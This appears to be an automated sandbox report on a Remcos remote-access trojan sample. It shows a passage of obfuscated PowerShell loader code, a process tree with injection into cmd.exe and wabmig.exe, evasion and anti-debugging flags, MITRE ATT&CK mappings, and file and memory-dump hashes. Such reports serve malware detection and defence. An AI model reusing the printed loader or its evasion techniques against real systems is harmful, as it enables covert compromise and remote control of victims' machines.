iSammevPluriaMedstl R,tieDamsen BiogtU.vale ArberNe co)Zymes ') ;Preapproval184 (Traverseringer 'Speak$RundhgSundhlStatioIn.utbst.lda An,el Indb:TyphoSInvesa Paasp Skra=Achil$Demo gdu nel Gra,o ska bAn tia feltl Mul.: arsoE Tegln FlowtNy ageHanderI effoCong,lLimbiiAevumtunderhTact.i orbaa .uirsHyperiUnequsOver +Bikag+ Sw,n%Reave$ rejnBMikror kftedOutbufPo ntd trll.UafvicK.gedosilviuAutornKa.iat Redb ') ;$Helbredelser=$Brdfd[$Sap];}$Effluent=328183;$Tilendebringende141=30662;Preapproval184 (Traverseringer 'Kisse$In urgInfi lReroyoS ranbAer sa A.telUnree:AndroUIdentdObtaivBrackitiltakPosi lFel fiImdekn S orgCholesPennaoUrsicmMill.kWhi woNedsksRinaltspanknAblatiTildenIngelgCannoeFattirFj re Coryl= aand AotesGAcroge expltR bbl- rillCforfaoRe imn Sys tBilleeUntarnTthedtforva ,rter$Vict.KHushovChintiSyendvDesubaColoul ExceeZym ln IntetGesxeeCentrr Vold ');Preapproval184 (Traverseringer 'Nonar$UtydegteleflSaltko HellbCons a Actal lbes: uforAAnalymyd.eltRidessCoriogMateraatr crR turaInst n Str.tBes ti Mano Haabe=Brier Krymm[measuSWo anyshifts ud,tt Opsae ,imimUltra.LianeCSaddloUbesknIndenv Aftee RaasrAchrotHamal]Regne:H ael:St,idF ingarOctupoBrnd,mButtoBExaggaCu drsRealie kort6Nonst4ForpaSRetspt.ardirAngreiAktien Hal gPic i( pr e$NotedU,krvldStrokvFiskei dssyk etall,ubliiAflusnprejugGolfes WhipoEmp,rmIm.erkredouoTyskesDismatRecoin DipliByggenHyphog HjlpeHaa drSlagt)Matut ');Preapproval184 (Traverseringer 'Stemm$FuglegReflel ouchop ismbreduxa Mylolvrkst:GraftK DioprUnderaMaranbTyvennForudiNaadlnArdufg,rila Ruina=Roets Newfo[ Fil,SFredyydeputsLindstSnorkeFdselmGraes.cooinT ,onne In exTunnetAmar,.DelegE EparnValuec DysfoUnfaddSuperiAfhudnFastlgOptim]temp.: Delt:Phy,oA,uttuSAllegC recrIOvercI adel.FoderGUnisteShellt trimSDest tFrkenrFatteiScle,nHeroigLuann(Afmar$Un ppAExpedm SkrktH,pnosSignagB nebaBianirE thra Afren UnextTi.loiL apf)icono ');Preapproval184 (Traverseringer 'Be ys$ Kil gIntenl Sub oVartebFarefasynstl Inst:RialtSfangskTail rTendeu omnieju tar Laci=Hoved$TessuKA grurPhoreaBoultbAerognUnderi AnarnShoolgCcid . alors sakruAtombbPristsTr pet SemirBlgedica.ulnForbrgHomer( Line$RoyceESvrdffRobo fDj ell SticuEuo meWositn KructAs.or,Slags$TjernTIonisiReadvl AegaeOvervn ,oetdOuttyeOpre.bTilvkr askihochhn LiqugSdssueintron Sk.ldUnbleehftn 1E.skl4 Ophi1dosim)Flage ');Preapproval184 $Skruer;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Favne.For && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4380
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
f7e4791bf9c35cbd0c3419aba1a08e00

SHA1
38cdfe05c1f4fb15f7457e208937f38fb741a65a

SHA256
78c52d7d5518ec5b97772c6c02c2afb5776c92bec0fe3e0dfcd727e131023d61

SHA512
2f0c83db2a1b34e55ec3609c051a5ca59d29a299830cbf32f0dfcc66ae1ed5e1f40afdcf16c5bb7a43a3d10f187338ac8d91e88bba061486c3cfa23e68c163f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvfudxrw.5i5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Favne.For

Filesize
467KB

MD5
984551d358934fa2b7f6c2bc4891b21a

SHA1
03e5155ad907e0c4d790bb6bdbbc147f06efb48f

SHA256
98c04389ddb9a5f913a1df69638a1d23dbd9185a2a33c46fbfc87184f020a5ec

SHA512
979c8fef38611637501e034cc83d5605d8de3f1260d078bf2eb59e891b062a039dfecbc0578d993c8e86f6c942d32816ced40255c98cdc9895b5e48dba03784a

Download Submit
memory/1504-44-0x0000000007F30000-0x00000000084D4000-memory.dmp

Filesize
5.6MB

Download
memory/1504-24-0x0000000004BD0000-0x0000000004BF2000-memory.dmp

Filesize
136KB

Download
memory/1504-46-0x00000000084E0000-0x0000000009B94000-memory.dmp

Filesize
22.7MB

Download
memory/1504-43-0x0000000006CE0000-0x0000000006D02000-memory.dmp

Filesize
136KB

Download
memory/1504-42-0x0000000006D50000-0x0000000006DE6000-memory.dmp

Filesize
600KB

Download
memory/1504-22-0x00000000022B0000-0x00000000022E6000-memory.dmp

Filesize
216KB

Download
memory/1504-23-0x0000000004DA0000-0x00000000053C8000-memory.dmp

Filesize
6.2MB

Download
memory/1504-41-0x0000000006030000-0x000000000604A000-memory.dmp

Filesize
104KB

Download
memory/1504-25-0x0000000004C80000-0x0000000004CE6000-memory.dmp

Filesize
408KB

Download
memory/1504-26-0x00000000053D0000-0x0000000005436000-memory.dmp

Filesize
408KB

Download
memory/1504-36-0x0000000005480000-0x00000000057D4000-memory.dmp

Filesize
3.3MB

Download
memory/1504-37-0x0000000005AC0000-0x0000000005ADE000-memory.dmp

Filesize
120KB

Download
memory/1504-38-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

Filesize
304KB

Download
memory/1504-40-0x0000000007300000-0x000000000797A000-memory.dmp

Filesize
6.5MB

Download
memory/2272-39-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-16-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-21-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-20-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-4-0x00007FF8F5FA3000-0x00007FF8F5FA5000-memory.dmp

Filesize
8KB

Download
memory/2272-15-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-19-0x00007FF8F5FA3000-0x00007FF8F5FA5000-memory.dmp

Filesize
8KB

Download
memory/2272-47-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-66-0x00007FF8F5FA0000-0x00007FF8F6A61000-memory.dmp

Filesize
10.8MB

Download
memory/2272-5-0x00000207B41C0000-0x00000207B41E2000-memory.dmp

Filesize
136KB

Download
memory/3112-48-0x0000000002460000-0x0000000003B14000-memory.dmp

Filesize
22.7MB

Download
memory/3112-63-0x0000000002460000-0x0000000003B14000-memory.dmp

Filesize
22.7MB

Download

Analysis

Sharing